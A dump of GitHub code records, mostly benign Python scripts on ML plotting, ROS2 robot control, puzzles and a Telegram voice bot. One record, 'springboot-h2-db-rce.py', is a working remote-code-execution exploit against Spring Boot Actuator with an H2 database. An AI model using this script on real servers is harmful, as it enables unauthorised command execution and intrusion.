1][y == 0], \"bs\")\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], \"g^\")\n plt.axis(axes)\n plt.grid(True, which='both')\n\n\ndef plot_predictions(clf, axes):\n x0s = np.linspace(axes[0], axes[1], 100)\n x1s = np.linspace(axes[2], axes[3], 100)\n x0, x1 = np.meshgrid(x0s, x1s) # 坐标矩阵——横坐标矩阵X中的每个元素,与纵坐标矩阵Y中对应位置元素,共同构成一个点的完整坐标。\n X = np.c_[x0.ravel(), x1.ravel()] # x0为所有点的横坐标矩阵,x1为所有点的纵坐标矩阵,矩阵形状为100*100\n y_pred = clf.predict(X).reshape(x0.shape)\n plt.contourf(x0, x1, y_pred, cmap=plt.cm.brg, alpha=0.2) # 等高线\n\n\nplt.subplot(121)\nplot_predictions(poly_kernal_svm_clf, [-1.5, 2.5, -1, 1.5])\nplot_dataset(X, y, [-1.5, 2.5, -1, 1.5])\nplt.title('degree=3')\nplt.subplot(122)\nplot_predictions(poly100_kernal_svm_clf, [-1.5, 2.5, -1, 1.5])\nplot_dataset(X, y, [-1.5, 2.5, -1, 1.5])\nplt.title('degree=100')\nplt.show()\n","repo_name":"siZaiMou/ML-Python-learning","sub_path":"SVM/no_linear_kernal.py","file_name":"no_linear_kernal.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73398840832","text":"import os\nfrom glob import glob\n\nfrom setuptools import setup\n\npackage_name = \"fogros2_examples\"\n\nsetup(\n name=package_name,\n version=\"0.0.1\",\n packages=[package_name],\n data_files=[\n (\n \"share/ament_index/resource_index/packages\",\n [os.path.join(\"resource\", package_name)],\n ),\n (os.path.join(\"share\", package_name), [\"package.xml\"]),\n (os.path.join(\"share\", package_name), glob(\"launch/*.launch.py\")),\n ],\n install_requires=[\"setuptools\"],\n zip_safe=True,\n author=\"Kaiyuan (Eric) Chen, Víctor Mayoral-Vilches\",\n author_email=\"kych@berkeley.edu, v.mayoralv@gmail.com\",\n maintainer=\"Kaiyuan (Eric) Chen\",\n maintainer_email=\"kych@berkeley.edu\",\n description=\"TODO: Package description\",\n license=\"TODO: License declaration\",\n tests_require=[\"pytest\"],\n entry_points={\n \"console_scripts\": [\n \"talker = fogros2_examples.talker:main\",\n \"listener = fogros2_examples.listener:main\",\n ],\n },\n)\n","repo_name":"BerkeleyAutomation/FogROS2","sub_path":"fogros2_examples/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"60"} +{"seq_id":"74259840832","text":"import numpy as np\nimport sigpy as sp\nimport time\nimport optpoly\n\nfrom tqdm.auto import tqdm\n\ndef unconstrained(num_iters, A, b, proxg, pdeg=None,\n norm=\"l_2\", l=0, verbose=True):\n\n device = sp.get_device(b)\n xp = device.xp\n\n P = sp.linop.Identity(A.ishape) if pdeg is None else \\\n optpoly.create_polynomial_preconditioner(pdeg, A.N, l, 1, \\\n norm=norm, verbose=verbose)\n\n with device:\n\n AHb = A.H(b)\n x = AHb.copy()\n z = x.copy()\n\n lst_time = []\n calc_tol = -1\n if verbose:\n pbar = tqdm(total=num_iters, desc=\"Unconstrained Optimization\", \\\n leave=True)\n for k in range(1, num_iters + 1):\n start_time = time.perf_counter()\n \n x_old = x.copy()\n x = z.copy()\n \n gr = A.N(x) - AHb\n x = proxg(1, x - P(gr))\n \n # DOI: 10.1007/s10957-015-0746-4\n step = (k - 1)/(k + 4)\n\n z = x + step * (x - x_old)\n\n end_time = time.perf_counter()\n lst_time.append(end_time - start_time)\n\n pbar.update()\n pbar.refresh()\n\n if verbose:\n pbar.close()\n\n return x\n","repo_name":"SophieSchau/MRF_demo_ISMRM2022","sub_path":"src/02_recon/optalg.py","file_name":"optalg.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"4343270099","text":"from collections import deque\r\nn, k = map(int, input().split())\r\n\r\narr = deque()\r\nfor i in range(1, n+1):\r\n arr.append(i)\r\nprint('<', end='')\r\nwhile(True):\r\n for i in range(k):\r\n if(len(arr) == 0):\r\n break\r\n x = arr.popleft()\r\n if(i == k-1):\r\n print(f'{x}', end='')\r\n break\r\n arr.append(x)\r\n if(len(arr) == 0):\r\n break\r\n print(', ', end='')\r\n\r\n\r\nprint('>')","repo_name":"mobuktodae/baekjoon","sub_path":"백준/Silver/11866. 요세푸스 문제 0/요세푸스 문제 0.py","file_name":"요세푸스 문제 0.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17399607426","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/5/15 13:19\r\n# @Author : GFX\r\n# @Site : \r\n# @File : train.py\r\n# @Software: PyCharm\r\n\r\n# 3 模型训练\r\n# 3.1 网络训练初始化\r\n\r\nfrom neural_net import TwoLayerNet\r\nfrom DataPreprocess import *\r\n# =============================================================================\r\n# from numpy import mean\r\n# =============================================================================\r\n\r\ninput_size = 32 * 32 * 3\r\nhidden_size = 50\r\nnum_classes = 10\r\nnet = TwoLayerNet(input_size, hidden_size, num_classes)\r\nstats = net.train(X_train, y_train, X_val, y_val, num_iters=1000, batch_size=200,\r\n learning_rate=1e-4, learning_rate_decay=0.95, reg=0.5, verbose=True)\r\nval_acc = (net.predict(X_val) == y_val).mean()\r\nprint('valiadation accuracy:', val_acc)\r\n# 输出:\r\n# iteration 0 / 1000 : loss 2.302975\r\n# iteration 100 / 1000 : loss 2.302409\r\n# iteration 200 / 1000 : loss 2.297453\r\n# iteration 300 / 1000 : loss 2.274700\r\n# iteration 400 / 1000 : loss 2.211710\r\n# iteration 500 / 1000 : loss 2.126385\r\n# iteration 600 / 1000 : loss 2.074668\r\n# iteration 700 / 1000 : loss 2.056960\r\n# iteration 800 / 1000 : loss 2.002378\r\n# iteration 900 / 1000 : loss 2.004737\r\n# valiadation accuracy: 0.279\r\n\r\n\r\n# =============================================================================\r\n# import matplotlib.pyplot as plt\r\n# \r\n# \r\n# plt.plot()\r\n# \r\n# plt.subplot(211)\r\n# plt.plot(stats['loss_history'])\r\n# plt.title('loss history')\r\n# plt.xlabel('iteration')\r\n# plt.ylabel('loss')\r\n# \r\n# plt.subplot(212)\r\n# plt.plot(stats['train_acc_history'],label='train')\r\n# plt.plot(stats['val_acc_history'],label='val')\r\n# plt.title('classification accuracy history')\r\n# plt.xlabel('epoch')\r\n# plt.ylabel('classification accuracy')\r\n# plt.show()\r\n# =============================================================================\r\n","repo_name":"xungeer29/Stanford-CS231n-Convolutional-Neural-Networks-for-Visual-Recognition","sub_path":"Assignment/Two Layers Neural Network/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"29272508920","text":"import os\nimport select\nimport sys\nimport rclpy\nimport cv2\nimport numpy as np\nfrom time import sleep\n\nimport subprocess\nfrom rclpy.node import Node\n\nfrom geometry_msgs.msg import Twist\nfrom rclpy.qos import QoSProfile\n\nif os.name == 'nt':\n import msvcrt\nelse:\n import termios\n import tty\n\nBURGER_MAX_LIN_VEL = 0.22\nBURGER_MAX_ANG_VEL = 2.84\n\nWAFFLE_MAX_LIN_VEL = 0.26\nWAFFLE_MAX_ANG_VEL = 1.82\n\nLIN_VEL_STEP_SIZE = 0.01\nANG_VEL_STEP_SIZE = 0.01\n\nTURTLEBOT3_MODEL = os.environ['TURTLEBOT3_MODEL']\n\nmsg = \"\"\"\nControl Your TurtleBot3!\n---------------------------\nMoving around:\n w\n a s d\n x\n\nw/x : increase/decrease linear velocity (Burger : ~ 0.22, Waffle and Waffle Pi : ~ 0.26)\na/d : increase/decrease angular velocity (Burger : ~ 2.84, Waffle and Waffle Pi : ~ 1.82)\n\nspace key, s : force stop\n\nCTRL-C to quit\n\"\"\"\n\ne = \"\"\"\nCommunications Failed\n\"\"\"\n\n\n\n\n# Cam methods\n\ndef findColor(img,lower_color,upper_color):\n img = cv2.GaussianBlur(frame, (11, 11), 0)\n imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n count = 0\n newPoints = []\n #for each of these colors we create a mask\n kernel = np.ones((9,9),np.uint8)\n mask = cv2.inRange(imgHSV, lower_color, upper_color)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n # find contours in the mask and initialize the current\n # (x, y) center of the ball\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n if len(cnts) > 0:\n # find the largest contour in the mask, then use it to compute the minimum enclosing circle and centroid\n c = max(cnts, key=cv2.contourArea)\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n # only proceed if the radius meets a minimum size. Correct this value for your obect's size\n if radius > 0.5:\n return x,y\n\n \n\ndef getContours(img):\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n x,y,w,h = 0,0,0,0\n if len(cnts) > 0:\n for cnt in contours:\n area = cv2.contourArea(cnt)\n print(area)\n if area>80:\n peri = cv2.arcLength(cnt,True)\n approx = cv2.approxPolyDP(cnt,0.02*peri,True)\n x, y, w, h = cv2.boundingRect(approx)\n return x+w//2, y \n\n\n\ncap = cv2.VideoCapture(\"http://192.168.1.100:8080/?action=stream\")\n\n\nlower_Blue = np.array([100, 100, 50])\nupper_Blue = np.array([130, 255, 255])\n\n\nlower_color = lower_Blue\nupper_color = upper_Blue\n\n\nmyColorValues = [[0,0,255]]\n\n\n\n\ndef get_key(settings):\n if os.name == 'nt':\n return msvcrt.getch().decode('utf-8')\n tty.setraw(sys.stdin.fileno())\n rlist, _, _ = select.select([sys.stdin], [], [], 0.1)\n if rlist:\n key = sys.stdin.read(1)\n else:\n key = ''\n\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n return key\n\n\ndef print_vels(target_linear_velocity, target_angular_velocity):\n print('currently:\\tlinear velocity {0}\\t angular velocity {1} '.format(\n target_linear_velocity,\n target_angular_velocity))\n\n\ndef make_simple_profile(output, input, slop):\n if input > output:\n output = min(input, output + slop)\n elif input < output:\n output = max(input, output - slop)\n else:\n output = input\n\n return output\n\n\ndef constrain(input_vel, low_bound, high_bound):\n if input_vel < low_bound:\n input_vel = low_bound\n elif input_vel > high_bound:\n input_vel = high_bound\n else:\n input_vel = input_vel\n\n return input_vel\n\n\ndef check_linear_limit_velocity(velocity):\n if TURTLEBOT3_MODEL == 'burger':\n return constrain(velocity, -BURGER_MAX_LIN_VEL, BURGER_MAX_LIN_VEL)\n else:\n return constrain(velocity, -WAFFLE_MAX_LIN_VEL, WAFFLE_MAX_LIN_VEL)\n\n\ndef check_angular_limit_velocity(velocity):\n if TURTLEBOT3_MODEL == 'burger':\n return constrain(velocity, -BURGER_MAX_ANG_VEL, BURGER_MAX_ANG_VEL)\n else:\n return constrain(velocity, -WAFFLE_MAX_ANG_VEL, WAFFLE_MAX_ANG_VEL)\n\n\n\nsettings = None\nif os.name != 'nt':\n settings = termios.tcgetattr(sys.stdin)\n\nrclpy.init()\n\nqos = QoSProfile(depth=10)\nnode = rclpy.create_node('teleop_keyboard')\npub = node.create_publisher(Twist, 'cmd_vel', qos)\n\nstatus = 0\ntarget_linear_velocity = 0.0\ntarget_angular_velocity = 0.0\ncontrol_linear_velocity = 0.0\ncontrol_angular_velocity = 0.0\n\n\n\nframeCounter = 0\n\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n frameResult = frame.copy()\n\n direction=\"\"\n\n\n frameCounter = frameCounter+1\n x,y = findColor(frame,lower_color,upper_color)\n #print(\"x: \"+str(x)+\" y:\"+str(y))\n if (frameCounter >=30) :\n frameCounter = 0\n \n\n cv2.imshow(\"Result\", frameResult)\n\n\n\n key = get_key(settings)\n if key == 'w':\n target_linear_velocity = check_linear_limit_velocity(target_linear_velocity + LIN_VEL_STEP_SIZE)\n print(\"w detected\")\n status = status + 1\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'x':\n target_linear_velocity = check_linear_limit_velocity(target_linear_velocity - LIN_VEL_STEP_SIZE)\n print(\"x detected\")\n status = status + 1\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif direction == 'L':\n #target_angular_velocity =check_angular_limit_velocity(target_angular_velocity + ANG_VEL_STEP_SIZE)\n status = status + 1\n print (\"L\")\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif direction == 'R':\n #target_angular_velocity = check_angular_limit_velocity(target_angular_velocity - ANG_VEL_STEP_SIZE)\n status = status + 1\n print (\"R\")\n #print_vels(target_linear_velocity, target_angular_velocity)\n elif direction == 'F':\n target_linear_velocity = 0.0\n control_linear_velocity = 0.0\n target_angular_velocity = 0.0\n control_angular_velocity = 0.0\n #print_vels(target_linear_velocity, target_angular_velocity)\n else:\n if (key == '\\x03'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n if status == 20:\n print(msg)\n status = 0\n\n twist = Twist()\n\n control_linear_velocity = make_simple_profile(\n control_linear_velocity,\n target_linear_velocity,\n (LIN_VEL_STEP_SIZE / 2.0))\n\n twist.linear.x = control_linear_velocity\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n\n control_angular_velocity = make_simple_profile(\n control_angular_velocity,\n target_angular_velocity,\n (ANG_VEL_STEP_SIZE / 2.0))\n\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = control_angular_velocity\n\n print (\"publish Twist\")\n pub.publish(twist)\n\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef main():\n settings = None\n if os.name != 'nt':\n settings = termios.tcgetattr(sys.stdin)\n\n rclpy.init()\n\n qos = QoSProfile(depth=10)\n node = rclpy.create_node('teleop_keyboard')\n pub = node.create_publisher(Twist, 'cmd_vel', qos)\n\n status = 0\n target_linear_velocity = 0.0\n target_angular_velocity = 0.0\n control_linear_velocity = 0.0\n control_angular_velocity = 0.0\n\n center = 480\n\n \n\n try:\n print(msg)\n while(1):\n\n key = get_key(settings)\n if key == 'w':\n target_linear_velocity =\\\n check_linear_limit_velocity(target_linear_velocity + LIN_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'x':\n target_linear_velocity =\\\n check_linear_limit_velocity(target_linear_velocity - LIN_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'a':\n target_angular_velocity =\\\n check_angular_limit_velocity(target_angular_velocity + ANG_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == 'd':\n target_angular_velocity =\\\n check_angular_limit_velocity(target_angular_velocity - ANG_VEL_STEP_SIZE)\n status = status + 1\n print_vels(target_linear_velocity, target_angular_velocity)\n elif key == ' ' or key == 's':\n target_linear_velocity = 0.0\n control_linear_velocity = 0.0\n target_angular_velocity = 0.0\n control_angular_velocity = 0.0\n print_vels(target_linear_velocity, target_angular_velocity)\n else:\n if (key == '\\x03'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n if status == 20:\n print(msg)\n status = 0\n\n twist = Twist()\n\n control_linear_velocity = make_simple_profile(\n control_linear_velocity,\n target_linear_velocity,\n (LIN_VEL_STEP_SIZE / 2.0))\n\n twist.linear.x = control_linear_velocity\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n\n control_angular_velocity = make_simple_profile(\n control_angular_velocity,\n target_angular_velocity,\n (ANG_VEL_STEP_SIZE / 2.0))\n\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = control_angular_velocity\n\n pub.publish(twist)\n\n except Exception as e:\n print(e)\n\n finally:\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n\n pub.publish(twist)\n\n if os.name != 'nt':\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mdequanter/ROS2_bridge_TurtlebotPlusOpenManipulator","sub_path":"turtlebot3ControlByCamera.py","file_name":"turtlebot3ControlByCamera.py","file_ext":"py","file_size_in_byte":10339,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"1701020287","text":"#!/usr/bin/python3\n'''A module for working with lockboxes.\n'''\n\n\ndef canUnlockAll(boxes):\n '''Checks if all the boxes in a list of boxes containing the keys\n (indices) to other boxes can be unlocked given that the first\n box is unlocked.\n '''\n box_length = set(range(1, len(boxes)))\n # print(len(box_length))\n\n for box in boxes:\n for index, key in enumerate(box):\n if index == len(box) - 2 and key != len(box_length):\n break\n if key in box_length:\n box_length.remove(key)\n print(box_length)\n\n return len(box_length) == 0\n","repo_name":"Henree001/alx-interview","sub_path":"0-lockboxes.py","file_name":"0-lockboxes.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17659345756","text":"class Solution(object):\n def letterCasePermutation(self, s):\n l =len(s)\n new =[]\n new.append(s)\n for i in range(0,l):\n if s[i].isalpha():\n temp =[]\n for j in range(0,len(new)):\n temp.append(new[j][0:i]+ s[i].lower()+ new[j][i+1:])\n temp.append(new[j][0:i]+ s[i].upper()+ new[j][i+1:])\n new=temp\n return new\n ","repo_name":"surmayi/CodePython","sub_path":"LeetCodeEasy/letterCasePermutation.py","file_name":"letterCasePermutation.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23201743817","text":"import csv\nimport mgrs\n\n# This script converts lat and long to a MGRS (Military Grid Reference Systems) reference\nout_csv = list(dict())\nfile = 'in_file'\noutfile = 'out_file.csv'\n\nwith open(file, mode='r') as infile:\n reader = csv.reader(infile)\n count = 0\n for rows in reader:\n print(rows)\n #first row in CSV is header, so need to handle this case\n if count == 0:\n header = rows\n header.append('MGRS')\n else:\n lat = float(rows[1])\n long = float(rows[2])\n m = mgrs.MGRS()\n c = m.toMGRS(lat, long)\n print(c)\n # this is of type(byte), so need to convert to string as below\n rows.append(c.decode(\"utf-8\"))\n count += 1\n out_csv.append(rows)\n\n\nwith open(outfile, 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n for rows in out_csv:\n wr.writerow(rows)\n","repo_name":"saparikh/gis-code","sub_path":"mgrs.py","file_name":"mgrs.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10672641034","text":"# https://www.codewars.com/kata/54d7660d2daf68c619000d95/train/python\n\n\ndef convertFracts(lst):\n if lst != [] :\n denominator = 1\n share = list()\n\n for i in lst :\n denominator *= i[1]\n share_elem = i[0]\n for t in range(len(lst)):\n if lst.index(i) != t :\n share_elem *= lst[t][1]\n share.append(share_elem)\n while (denominator % 2 == 0 and len([i for i in share if i%2==0]) == len(share) ) or (denominator % 3 == 0 and len([i for i in share if i%3==0]) == len(share) ) or (denominator % 5 == 0 and len([i for i in share if i%5==0]) == len(share) ):\n if denominator % 2 == 0 and len([i for i in share if i%2==0]) == len(share) :\n denominator=denominator / 2\n for i in range(len(share)) :\n share[i] /= 2 \n elif denominator % 3 == 0 and len([i for i in share if i%3==0]) == len(share) :\n denominator=denominator / 3\n for i in range(len(share)) :\n share[i] /= 3\n else:\n denominator=denominator / 5\n for i in range(len(share)) :\n share[i] /= 5 \n for i in range(len(lst)) :\n for t in range(len(lst[i])) :\n if t == 0:\n lst[i][t] = share[i]\n else:\n lst[i][t] = denominator\n return lst\n else :\n return [] \n \nprint(convertFracts([[1,3],[1,4],[1,6],[1,12]]))\n\n\n\n\n# ------------------------------\n\n# def convertFracts(lst):\n# e = 1\n# for i in lst:\n# e = lcm(e, i[1])\n# return [[int(e/i[1])*i[0], e] for i in lst]\n \n# def gcd(a,b): \n# if a == 0: \n# return b\n# return gcd(b % a, a) \n \n# def lcm(a,b): \n# return (a*b) / gcd(a,b)","repo_name":"oguzhanun/10_PythonProjects","sub_path":"challange/codewars/common_denominator.py","file_name":"common_denominator.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10226068826","text":"import requests\nimport sys\nimport json\nimport argparse\n\ndef check_vulnerable(url):\n env_endpoint = url\n try:\n r = requests.get(env_endpoint)\n if \"hikari\" in r.text:\n print(\"[+] {url} is vulnerable to Springboot Actuator H2 rce!\".format(url=url))\n else:\n print(\"[!] {url} is not vulnerable to Springboot Actuator H2 rce!\".format(url=url))\n sys.exit()\n except Exception as e:\n print(\"[!] An error occurred when accessing {url}/actuator/env\".format(url=url))\n print(e)\n sys.exit()\n\ndef send_payload(url, cmd):\n exploit_endpoint = url \n exploit_code = \"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('\"+cmd+\"');\"\n payload = {\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\": exploit_code}\n headers = {\n \"Content-Type\":\"application/json\"\n }\n try:\n r = requests.post(exploit_endpoint, headers=headers, data=json.dumps(payload))\n print(\"[+] Payload sent to {url}/actuator/env\".format(url=url))\n except Exception as e:\n print(\"[!] An error occurred when sending exploit payload to {url}/actuator/env\".format(url=url))\n print(e)\n sys.exit()\n\ndef restart_actuator(url):\n exploit_endpoint = url.replace(\"/env\", \"/restart\")\n headers = {\n \"Content-Type\":\"application/json\"\n }\n try:\n payload = {}\n r = requests.post(exploit_endpoint,headers=headers)\n if r.json()[\"message\"] == \"Restarting\":\n print(\"[+] Exploit succeeded!\")\n else:\n print(\"[*] Exploit failed!\")\n except Exception as e:\n print(\"[!] An error occured when restarting {url}\".format(url=url))\n print(e)\n sys.exit()\n\ndef exploit(url, cmd):\n check_vulnerable(url)\n send_payload(url, cmd)\n restart_actuator(url)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--url', help='Target url')\n parser.add_argument('--cmd', help='Exec CMD')\n args = parser.parse_args()\n exploit(args.url, args.cmd)\n","repo_name":"myh0st/scripts","sub_path":"springboot-h2-db-rce.py","file_name":"springboot-h2-db-rce.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"60"} +{"seq_id":"32232835174","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Playing cards module for teaching loops\"\"\"\nimport random\nfrom typing import List, Tuple\n\nsuit_symbols = {\"clubs\": \"♣\", \"diamonds\": \"♦\", \"hearts\": \"♥\", \"spades\": \"♠\"}\nranks = [\"A\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\"]\n\n\nclass Card:\n \"\"\"\n Class describing playing card objects\n \"\"\"\n def __init__(self, suit: str, rank: str):\n self.suit = suit\n self.rank = rank\n self.value = ranks.index(rank)+1\n def __repr__(self):\n return f\"{suit_symbols[self.suit]}{self.rank}\"\n def __gt__(self, other): \n if(self.value>other.value): \n return True\n else: \n return False\n\n\"\"\"\nFunction to get an ordered full 52-card deck\n\"\"\"\ndef full_deck()-> List[Card]:\n deck = []\n for suit in suit_symbols.keys():\n for rank in ranks:\n deck.append(Card(suit,rank))\n return deck\n\ndef deck_from_list(input: List[Tuple])->List[Card]:\n return [Card(*card) for card in input]\n\n\"\"\"\nFunction to shuffle deck of cards (list of Card objects) \n\"\"\"\ndef shuffle(deck: List[Card]) -> List[Card]:\n for i,card in enumerate(deck):\n r = random.randint(0,len(deck)-1)\n deck[r],deck[i] = deck[i],deck[r]\n return deck\n\n# Get a small random deck\ndef small_random_deck(size: int) -> List[Card]:\n deck = full_deck().copy()\n if size>52: size=52\n return shuffle(deck)[:size]\n\n# Get a small random deck that is guaranteed to have at least one heart and one diamond\ndef safe_small_random_deck(size: int) -> List[Card]:\n deck = full_deck().copy()\n if size>52: size=52\n subdeck = shuffle(deck)[:size]\n has_hearts = False\n has_diamonds = False\n for c in subdeck:\n if c.suit == 'hearts':\n has_hearts = True\n elif c.suit == 'diamonds':\n has_diamonds = True\n if has_hearts and has_diamonds:\n break\n if not has_hearts:\n if subdeck[0].suit != 'diamonds':\n subdeck[0] = Card('hearts', ranks[random.randint(0,len(ranks)-1)])\n else:\n subdeck[1] = Card('hearts', ranks[random.randint(0,len(ranks)-1)])\n if not has_diamonds:\n if subdeck[0].suit != 'hearts':\n subdeck[0] = Card('diamonds', ranks[random.randint(0,len(ranks)-1)])\n else:\n subdeck[1] = Card('diamonds', ranks[random.randint(0,len(ranks)-1)])\n shuffle(subdeck)\n return subdeck\n\n# add card to a deck, useful for testing (not destructive)\ndef insert_card(deck : List[Card], rank : int, suit: str, index : int =random.random() ) -> List[Card]:\n new_deck = deck.copy()\n new_card = Card(suit, rank)\n first_half = new_deck[:index]\n second_half = new_deck[index:]\n first_half.append(new_card)\n out_deck = first_half + second_half\n return out_deck\n\n","repo_name":"irabkina/python-loops","sub_path":"cards/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32816317536","text":"'''\nn!= 1*2*3*4*5*6*7.......*n\nn!= 1*2*3*4*5..........*n-1*n\nn!= [1*2*3*4*5..........*n-1]*n\nn!= [n-1]!*n\n'''\n\ndef factorial_recursive(fact):\n if fact==1 or fact==0:\n return 1\n return factorial_recursive(fact-1)*fact\n\n\nresultant=factorial_recursive(5)\nprint(resultant)\n\n\n","repo_name":"user-candycode/python-programs","sub_path":"first/eight/03_factorial_function.py","file_name":"03_factorial_function.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"21296185566","text":"import re\n\npattern = r\"((www\\.)([a-zA-Z0-9\\-]+)(\\.[a-z]+)+)\"\n\nres = []\n\nline = input()\n\nwhile True:\n if line:\n matches = re.search(pattern, line)\n if matches:\n res.append(matches.group(0))\n line = input()\n else:\n break\n\nprint('\\n'.join(res))","repo_name":"ZhekoGinev/SoftUni","sub_path":"Python/01-python-fundamentals/09-regex/02-exercise/06-extract-the-links.py","file_name":"06-extract-the-links.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"3118852104","text":"import os\nfrom dotenv import load_dotenv\nimport openai\nfrom telegram import Update\nfrom telegram.ext import Application, ContextTypes, MessageHandler, filters\nfrom langchain.prompts import (\n ChatPromptTemplate,\n MessagesPlaceholder,\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n)\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.chains import LLMChain\nfrom langchain.chat_models import ChatOpenAI\nfrom elevenlabs import generate\nfrom pydub import AudioSegment\n\n\nasync def on_messages(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\" Fonction de callback pour gérer les messages entrants \"\"\"\n # Lance ChatGPT en asynchrone pour générer une réponse\n reponse = await conversation.arun(update.message.text)\n # Envoie la réponse\n await update.message.reply_text(reponse)\n\n\nasync def on_voices(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"Gere les messages vocaux\"\"\"\n audio = await update.message.voice.get_file()\n await audio.download_to_drive(\"message_vocal.oga\")\n\n # Transcription du message vocal\n with open(\"message_vocal.oga\", \"rb\") as audio_file:\n transcript = openai.Audio.transcribe(\n \"whisper-1\",\n audio_file,\n api_key=os.environ[\"OPENAI_API_KEY\"])\n\n # Lance ChatGPT en asynchrone pour générer une réponse\n reponse = await conversation.arun(transcript[\"text\"])\n\n # Genere la voix\n audio = generate(\n text=reponse,\n voice=\"Bella\",\n model=\"eleven_multilingual_v1\"\n )\n\n # Enregistre la voix dans fichier temporaire\n with open(\"voix_genere.mp3\", \"wb\") as f:\n f.write(audio)\n\n # Convertis la voix dans un format que Telegram accepte comme message vocal (.ogg)\n AudioSegment.from_file(\"voix_genere.mp3\", \"mp3\").export(\n \"voix_genere.ogg\", format=\"ogg\")\n await update.message.reply_voice(\"voix_genere.ogg\")\n\n # Supprime les fichiers vocaux temporaires\n os.remove(\"message_vocal.oga\")\n os.remove(\"voix_genere.mp3\")\n os.remove(\"voix_genere.ogg\")\n\n\ndef setup_conversation() -> LLMChain:\n # LLM\n llm = ChatOpenAI(openai_api_key=os.environ[\"OPENAI_API_KEY\"])\n\n # Prompt\n prompt = ChatPromptTemplate(\n messages=[\n SystemMessagePromptTemplate.from_template(\n \"You are a nice chatbot having a conversation with a human. Give simple answers no list or long sentences.\"\n ),\n # The `variable_name` here is what must align with memory\n MessagesPlaceholder(variable_name=\"chat_history\"),\n HumanMessagePromptTemplate.from_template(\"{question}\")\n ]\n )\n\n # Garde en memoire l'historique des messages\n memory = 